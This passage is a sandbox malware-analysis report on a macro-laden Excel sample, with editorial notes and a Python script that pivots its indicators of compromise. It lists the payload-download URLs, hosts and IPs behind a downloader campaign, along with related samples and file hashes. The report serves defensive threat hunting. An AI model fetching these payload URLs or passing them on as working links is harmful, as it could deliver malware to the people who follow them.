    http://biblicalisraeltours.com/otmchxmxeg/44251495573726900000.dat | false | Avira URL Cloud: safe | unknown
    http://rzminc.com/fdzgprclatqo/44251495573726900000.dat | false | Avira URL Cloud: safe | unknown
    Only one of the five URLs carries a vendor verdict, but all five were requested by the same macro for the same file name (44251495573726900000.dat) on different hosts. A "safe" verdict on the other four means only that the scanner had no entry for them; treat all five as one download rotation when blocking and hunting.
    URLs found in process memory

    Memory-dump sources (rundll32.exe):
      [A] 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp
      [B] 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp
      [C] 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | [B] | false | - | high
    http://www.windows.com/pctv. | [C] | false | - | high
    http://investor.msn.com | [A] | false | - | high
    http://www.msnbc.com/news/ticker.txt | [A] | false | - | high
    http://www.icra.org/vocabulary/. | [B] | false | URL Reputation: safe (listed 3 times) | unknown
    http://investor.msn.com/ | [A] | false | - | high
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | [B] | false | URL Reputation: safe (listed 3 times) | unknown
    http://www.hotmail.com/oe | [A] | false | - | high
    These are well-known Microsoft URLs found as strings in rundll32.exe memory; none of them appears in the DNS or HTTP evidence of this run, so they are not indicators for this sample.
IP              Domain    Country         ASN     ASN Name             Malicious
162.241.80.6    unknown   United States   46606   UNIFIEDLAYER-AS-1US  false
138.36.237.100  unknown   Argentina       27823   DattateccomAR        false
68.66.216.42    unknown   United States   55293   A2HOSTINGUS          false
72.52.227.180   unknown   United States   32244   LIQUIDWEBUS          false

Note: "Malicious: false" is the per-address reputation flag, not a verdict on the traffic. The context sections further down tie these four addresses to the payload-hosting domains pathinanchilearthmovers.com, jugueterialatorre.com.ar, biblicalisraeltours.com and rzminc.com, each of which served a .dat payload to earlier samples of the same campaign.

                          General Information

                          Joe Sandbox Version:31.0.0 Emerald
                          Analysis ID:357282
                          Start date:24.02.2021
                          Start time:11:53:23
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 6m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:SecuriteInfo.com.XF.AShadow.4960.21593.8307 (renamed file extension from 8307 to xls)
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal84.expl.evad.winXLS@11/13@6/4
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Found warning dialog
                          • Click Ok
                          • Found warning dialog
                          • Click Ok
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 91.199.212.52, 205.185.216.42, 205.185.216.10
                          • Excluded domains from analysis (whitelisted): crt.usertrust.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          No simulations
Match  Associated Sample Name  Detection  Context
162.241.80.6
  Complaint-1992179913-02182021.xls  (malicious)  pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat
  Complaint-1992179913-02182021.xls  (malicious)  pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat
  Complaint-447781983-02182021.xls  (malicious)  pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat
  Complaint-447781983-02182021.xls  (malicious)  pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
138.36.237.100
  Complaint-1992179913-02182021.xls  (malicious)  jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat
  Complaint-1992179913-02182021.xls  (malicious)  jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat
  Complaint-447781983-02182021.xls  (malicious)  jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
  Complaint-447781983-02182021.xls  (malicious)  jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
  CompensationClaim-46373845-02032021.xls  (malicious, 2 analyses)  jugueteriaelgato.com.ar/zsrrq/416212.jpg
  CompensationClaim-1245593270-02032021.xls  (malicious, 2 analyses)  loonytoys.com.ar/rqksqzjvcmv/416212.jpg
  fp5H5ulYUE5566sbSLC2.xls  (malicious, 2 analyses)  loonytoys.com.ar/rqksqzjvcmv/416212.jpg
68.66.216.42
  Complaint-1992179913-02182021.xls  (malicious)  biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat
  Complaint-447781983-02182021.xls  (malicious)  biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat
  ac6e58332e379d0712d36c5c83985c42.xls  (malicious, 2 analyses)  biblicalisraeltours.com/ivqcapzu/987298.jpg
72.52.227.180
  Complaint-1992179913-02182021.xls  (malicious)  rzminc.com/fdzgprclatqo/44250666589120400000.dat
  Complaint-1992179913-02182021.xls  (malicious)  rzminc.com/fdzgprclatqo/44250659496064800000.dat
  Complaint-447781983-02182021.xls  (malicious)  rzminc.com/fdzgprclatqo/44250601302777800000.dat
  Complaint-447781983-02182021.xls  (malicious)  rzminc.com/fdzgprclatqo/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  rzminc.com/fdzgprclatqo/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls  (malicious)  rzminc.com/fdzgprclatqo/44245955293750000000.dat
Match  Associated Sample Name  Detection  Context
biblicalisraeltours.com
  Complaint-1992179913-02182021.xls  (malicious)  68.66.216.42
  Complaint-447781983-02182021.xls  (malicious)  68.66.216.42
  SecuriteInfo.com.Heur.10413.xls  (malicious, 2 analyses)  68.66.216.42
  ac6e58332e379d0712d36c5c83985c42.xls  (malicious, 2 analyses)  68.66.216.42
crt.sectigo.com
  Complaint-1992179913-02182021.xls  (malicious, 2 analyses)  91.199.212.52
  Complaint-447781983-02182021.xls  (malicious, 2 analyses)  91.199.212.52
  CorpReport.exe  (malicious)  91.199.212.52
  sys.dll  (malicious)  91.199.212.52
  CorpReport.exe  (malicious, 2 analyses)  91.199.212.52
  ReportCorp.exe  (malicious)  91.199.212.52
  1S0a576pAR.exe  (malicious)  91.199.212.52
  NJx63jHebE.exe  (malicious)  91.199.212.52
  EmployeeComplaintReport.exe  (malicious)  91.199.212.52
  ct.dll  (malicious)  91.199.212.52
  CompensationClaim-46373845-02032021.xls  (malicious, 2 analyses)  91.199.212.52
  documents.doc  (malicious)  91.199.212.52
  ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc  (malicious)  91.199.212.52
  N.11389944 BS 05 gen 2021.doc  (malicious)  91.199.212.52
  PSX7103491.doc  (malicious)  91.199.212.52
  Beauftragung.doc  (malicious)  91.199.212.52
rzminc.com
  Complaint-1992179913-02182021.xls  (malicious, 2 analyses)  72.52.227.180
  Complaint-447781983-02182021.xls  (malicious, 2 analyses)  72.52.227.180
  SecuriteInfo.com.Heur.10413.xls  (malicious, 2 analyses)  72.52.227.180
jugueterialatorre.com.ar
  Complaint-1992179913-02182021.xls  (malicious, 2 analyses)  138.36.237.100
  Complaint-447781983-02182021.xls  (malicious, 2 analyses)  138.36.237.100
  SecuriteInfo.com.Heur.10413.xls  (malicious, 2 analyses)  138.36.237.100
pathinanchilearthmovers.com
  Complaint-1992179913-02182021.xls  (malicious, 2 analyses)  162.241.80.6
  Complaint-447781983-02182021.xls  (malicious, 2 analyses)  162.241.80.6
  SecuriteInfo.com.Heur.10413.xls  (malicious, 2 analyses)  162.241.80.6

Note: crt.sectigo.com is a certificate-distribution host; the samples listed under it (EXE, DLL and Office documents from unrelated families) share it only because CryptoAPI fetched an issuer certificate while building a chain. The report itself excludes its address 91.199.212.52 from analysis. Do not carry this domain into a blocklist; the four payload domains above are the campaign-specific indicators.
Match  Associated Sample Name  Detection  Context
DattateccomAR
  zJsbHB4YyL.doc  (malicious)  200.58.110.56
  Complaint-1992179913-02182021.xls  (malicious, 2 analyses)  138.36.237.100
  Complaint-447781983-02182021.xls  (malicious, 2 analyses)  138.36.237.100
  SecuriteInfo.com.Heur.10413.xls  (malicious, 2 analyses)  138.36.237.100
  swift copy pdf.exe  (malicious)  200.58.111.74
  Purchase Order _pdf.exe  (malicious, 2 analyses)  200.58.111.74
  CompensationClaim-46373845-02032021.xls  (malicious, 2 analyses)  138.36.237.100
  CompensationClaim-1245593270-02032021.xls  (malicious, 2 analyses)  138.36.237.100
  fp5H5ulYUE5566sbSLC2.xls  (malicious, 2 analyses)  138.36.237.100
  Payment Advice.xlsx  (malicious)  66.97.33.176
  Meezan Bank Payment.xlsx  (malicious)  179.43.117.150
  Walmart Order.xlsx  (malicious)  179.43.117.150
  INQUIRY-NOV-ORDER.xls  (malicious)  179.43.114.162
UNIFIEDLAYER-AS-1US
  Quotations.xlsx  (malicious)  50.87.253.95
  orden de compra xls.exe  (malicious)  192.185.100.181
  3zutY8IPBS.exe  (malicious)  192.185.113.223
  Attachment_78216.xlsb  (malicious)  192.254.183.124
  00113221.xlsx  (malicious)  74.220.199.6
  Outstanding Payment.exe  (malicious)  108.179.232.42
  vB1Zux02Zf.exe  (malicious)  162.241.217.138
  MV9tCJw8Xr.exe  (malicious)  198.20.228.9
  Complaint-1992179913-02182021.xls  (malicious, 2 analyses)  162.241.80.6
  Complaint-447781983-02182021.xls  (malicious, 2 analyses)  162.241.80.6
  Payment Transfer Copy of $274,876.00 for the invoice shipments.exe  (malicious)  50.116.112.43
  ORDER SPECIFICATIONS.exe  (malicious)  50.87.196.120
  PO-A2174679-06.exe  (malicious)  192.185.78.145
  22 FEB -PROCESSING.xlsx  (malicious)  108.167.156.42
  CV-JOB REQUEST______PDF.EXE  (malicious)  192.185.181.49
  PO.exe  (malicious)  192.185.0.218
  Complaint-1091191320-02182021.xls  (malicious)  192.185.16.95
  ESCANEAR_FACTURA-20794564552_docx.exe  (malicious)  162.214.158.75
A2HOSTINGUS
  Complaint-1992179913-02182021.xls  (malicious)  68.66.216.42
  Complaint-447781983-02182021.xls  (malicious)  68.66.216.42
  SecuriteInfo.com.Heur.10413.xls  (malicious, 2 analyses)  68.66.216.42
  Statement_of_Account_as_of 02_17_2021.xlsm  (malicious, 2 analyses)  68.66.248.35
  Claim-121548989-02162021.xls  (malicious)  68.66.226.85
  ProtectedAdviceSlip.xls  (malicious)  70.32.23.16
  v1K1JNtCgt.exe  (malicious)  209.124.66.12
  CompensationClaim-1625519734-02022021.xls  (malicious, 2 analyses)  185.148.129.158
  CompensationClaim-1828072340-02022021.xls  (malicious, 2 analyses)  185.148.129.158
  ac6e58332e379d0712d36c5c83985c42.xls  (malicious, 2 analyses)  185.148.129.158
  CompensationClaim-1378529713-02022021.xls  (malicious, 2 analyses)  185.148.129.158
  v22Pc0qA.doc.doc  (malicious)  70.32.23.44
  2wUaqWdy.doc.doc  (malicious)  70.32.23.44
  A3kAp3uzpg.xlsm  (malicious)  85.187.128.19
Match  Associated Sample Name  Detection  Context
JA3 7dcce5b76c8b17472d024758970a406b
  document-350252698.xls  (malicious)  138.36.237.100
  Document14371.xls  (malicious)  138.36.237.100
  Complaint_Letter_1186814227-02192021.xls  (malicious)  138.36.237.100
  Complaint-1992179913-02182021.xls  (malicious)  138.36.237.100
  Complaint-447781983-02182021.xls  (malicious)  138.36.237.100
  mexhlc.xlsx  (malicious)  138.36.237.100
  document-550193913.xls  (malicious)  138.36.237.100
  document-1915351743.xls  (malicious)  138.36.237.100
  SecuriteInfo.com.Heur.15528.xls  (malicious)  138.36.237.100
  Subconract 504.xlsm  (malicious)  138.36.237.100
  upbck.xlsx  (malicious)  138.36.237.100
  IMG_6078_SCANNED.doc  (malicious)  138.36.237.100
  RFQ Manual Supersucker en Espaol.xlsx  (malicious)  138.36.237.100
  _a6590.docx  (malicious)  138.36.237.100
  Small Charities.xlsx  (malicious)  138.36.237.100
  quotation10204168.dox.xlsx  (malicious)  138.36.237.100
  notice of arrival.xlsx  (malicious)  138.36.237.100
  22-2-2021 .xlsx  (malicious)  138.36.237.100
  Shipping_Document.xlsx  (malicious)  138.36.237.100
  Remittance copy.xlsx  (malicious)  138.36.237.100

Note: a JA3 hash fingerprints the TLS client implementation, not the document. Every sample run on the same OS image with the same client stack produces the same value, and so does benign software, so this match only corroborates the overlap on 138.36.237.100; it is not an indicator on its own.
                          No context
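The context rows above can be pivoted mechanically. The following is an added example, written for this page and not part of the Joe Sandbox report: it takes the IP-context rows (copied here as constructed input, with exact-duplicate rows from repeated analyses collapsed), groups each payload file name by the hosts that served it, and decodes the long numeric .dat names. Reading those names as Excel date serials with the decimal point removed (five day digits plus the fraction of a day, i.e. the output of NOW() written as a file name) is an editor's inference that the report does not state; it is supported by the fact that the 44245... names belong to the samples analysed around 18 February 2021 and the 44250... names to those of 23 February 2021.

```python
"""Pivot over the Joe Sandbox View IP-context rows (added example, not report output)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (contacted IP, related sample, payload URL) copied from the IP context rows above;
# rows that were listed twice for two analyses of the same sample appear once here.
CONTEXT_ROWS = [
    ("162.241.80.6", "Complaint-1992179913-02182021.xls", "pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat"),
    ("162.241.80.6", "Complaint-1992179913-02182021.xls", "pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat"),
    ("162.241.80.6", "Complaint-447781983-02182021.xls", "pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat"),
    ("162.241.80.6", "Complaint-447781983-02182021.xls", "pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat"),
    ("162.241.80.6", "SecuriteInfo.com.Heur.10413.xls", "pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat"),
    ("162.241.80.6", "SecuriteInfo.com.Heur.10413.xls", "pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat"),
    ("138.36.237.100", "Complaint-1992179913-02182021.xls", "jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat"),
    ("138.36.237.100", "Complaint-1992179913-02182021.xls", "jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat"),
    ("138.36.237.100", "Complaint-447781983-02182021.xls", "jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat"),
    ("138.36.237.100", "Complaint-447781983-02182021.xls", "jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat"),
    ("138.36.237.100", "SecuriteInfo.com.Heur.10413.xls", "jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat"),
    ("138.36.237.100", "SecuriteInfo.com.Heur.10413.xls", "jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat"),
    ("138.36.237.100", "CompensationClaim-46373845-02032021.xls", "jugueteriaelgato.com.ar/zsrrq/416212.jpg"),
    ("138.36.237.100", "CompensationClaim-1245593270-02032021.xls", "loonytoys.com.ar/rqksqzjvcmv/416212.jpg"),
    ("138.36.237.100", "fp5H5ulYUE5566sbSLC2.xls", "loonytoys.com.ar/rqksqzjvcmv/416212.jpg"),
    ("68.66.216.42", "Complaint-1992179913-02182021.xls", "biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat"),
    ("68.66.216.42", "Complaint-447781983-02182021.xls", "biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat"),
    ("68.66.216.42", "SecuriteInfo.com.Heur.10413.xls", "biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat"),
    ("68.66.216.42", "SecuriteInfo.com.Heur.10413.xls", "biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat"),
    ("68.66.216.42", "ac6e58332e379d0712d36c5c83985c42.xls", "biblicalisraeltours.com/ivqcapzu/987298.jpg"),
    ("72.52.227.180", "Complaint-1992179913-02182021.xls", "rzminc.com/fdzgprclatqo/44250666589120400000.dat"),
    ("72.52.227.180", "Complaint-1992179913-02182021.xls", "rzminc.com/fdzgprclatqo/44250659496064800000.dat"),
    ("72.52.227.180", "Complaint-447781983-02182021.xls", "rzminc.com/fdzgprclatqo/44250601302777800000.dat"),
    ("72.52.227.180", "Complaint-447781983-02182021.xls", "rzminc.com/fdzgprclatqo/44250596245254600000.dat"),
    ("72.52.227.180", "SecuriteInfo.com.Heur.10413.xls", "rzminc.com/fdzgprclatqo/44245960229745400000.dat"),
    ("72.52.227.180", "SecuriteInfo.com.Heur.10413.xls", "rzminc.com/fdzgprclatqo/44245955293750000000.dat"),
]

EXCEL_EPOCH = datetime(1899, 12, 30)            # serial 0 of Excel's 1900 date system
SERIAL_NAME = re.compile(r"^(\d{5})(\d+)\.dat$")  # five day digits, then the day fraction


def decode_dat_name(url_or_name):
    """Return the datetime a <serial>.dat name encodes, or None for non-numeric names.

    Inference (not stated by the report): the name is Excel's NOW() serial with the
    decimal point dropped, so "44250666589120400000" is serial 44250.6665891204.
    """
    name = url_or_name.rsplit("/", 1)[-1]
    m = SERIAL_NAME.match(name)
    if not m:
        return None
    return EXCEL_EPOCH + timedelta(days=float(f"{m.group(1)}.{m.group(2)}"))


def hosts_by_payload(rows):
    """Map each payload file name to the sorted list of hosts that served it."""
    out = defaultdict(set)
    for _ip, _sample, url in rows:
        host, _, path = url.partition("/")
        out[path.rsplit("/", 1)[-1]].add(host)
    return {name: sorted(hosts) for name, hosts in out.items()}


def download_chain(rows, sample):
    """Distinct hosts one related sample pulled from, in the order the report lists them."""
    seen = []
    for _ip, s, url in rows:
        host = url.split("/", 1)[0]
        if s == sample and host not in seen:
            seen.append(host)
    return seen


if __name__ == "__main__":
    for name, hosts in sorted(hosts_by_payload(CONTEXT_ROWS).items()):
        when = decode_dat_name(name)
        stamp = when.strftime("%Y-%m-%d %H:%M:%S") if when else "not a serial"
        print(f"{name:28} {stamp:20} {len(hosts)} host(s): {', '.join(hosts)}")
```

The useful result is that one serial (one macro run) appears on up to four hosts, which is what a downloader that walks a list of fallback servers looks like from the outside; when hunting, key on the directory-plus-serial pattern rather than on any single host.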
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):1559
                          Entropy (8bit):7.399832861783252
                          Encrypted:false
                          SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                          MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                          SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                          SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                          SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: 0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                          Category:dropped
                          Size (bytes):59134
                          Entropy (8bit):7.995450161616763
                          Encrypted:true
                          SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                          MD5:E92176B0889CC1BB97114BEB2F3C1728
                          SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                          SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                          SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):1413
                          Entropy (8bit):7.480496427934893
                          Encrypted:false
                          SSDEEP:24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
                          MD5:285EC909C4AB0D2D57F5086B225799AA
                          SHA1:D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
                          SHA-256:68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
                          SHA-512:4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: 0...0..i.......9rD:.".Q..l..15.0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0...*.H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):282
                          Entropy (8bit):3.129725157113391
                          Encrypted:false
                          SSDEEP:3:kkFklHhOR9llXfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ1N:kKxR9llqjXxp9jKFlIaYM2+/LOjA/
                          MD5:5959AC649656458494BAB1F86BEB3DB1
                          SHA1:30A80439CDB3DDFAB9BFB433E0E47B957E046B3C
                          SHA-256:C8F0EA3ED5E82F77EB870EAAA5E4E02FBD49B59F1A32DB38A0D4B39E01F3AF0D
                          SHA-512:23B660C8CA426D37A555E9793751FB2910A3080DB0C86C6FD4DAB8DB7FB624EC9B1685169CC857AED974ABA70FFD70CF14BF03EA90DDFBA64E0CDD22A6B5BAB5
                          Malicious:false
                          Reputation:low
                          Preview: p...... ........2D......(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):328
                          Entropy (8bit):3.0786571245093444
                          Encrypted:false
                          SSDEEP:6:kKepbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Ww3kPlE99SNxAhUeo+aKt
                          MD5:C471F3E3546ABE9A156D79E7B2031F81
                          SHA1:BB0FB1A17A9DA6F54AD54925A62BB6BE5CA5CBE2
                          SHA-256:99F56F67D6CDCD1E3323B4B9B839F4E217D9D97393D14DACC1D802B6732ECCA5
                          SHA-512:E1985C606579C3ADCE8A9EC0CCFD315C280FF7DA3B7CD00E4A430DFAD30E9218B32F96B75E6A70DFA2ACCB4E677A54CEFD21CBDA8E4EACA110A35165FB7A109A
                          Malicious:false
                          Preview: p...... ..........'.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):250
                          Entropy (8bit):2.969287375524799
                          Encrypted:false
                          SSDEEP:3:kkFklNlAlDqMlXfllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9o:kKFleMlqQAbjMulgokaWbLOW+n
                          MD5:8422257CB589C7117C98EB66825EABE5
                          SHA1:E8589CAADAC4C2755A76C24D1C16F55E38AA7DFE
                          SHA-256:62EF633B1F4306B5370DA5DA8FFFA13ED0AE505BCEB35DB1124694017CF05646
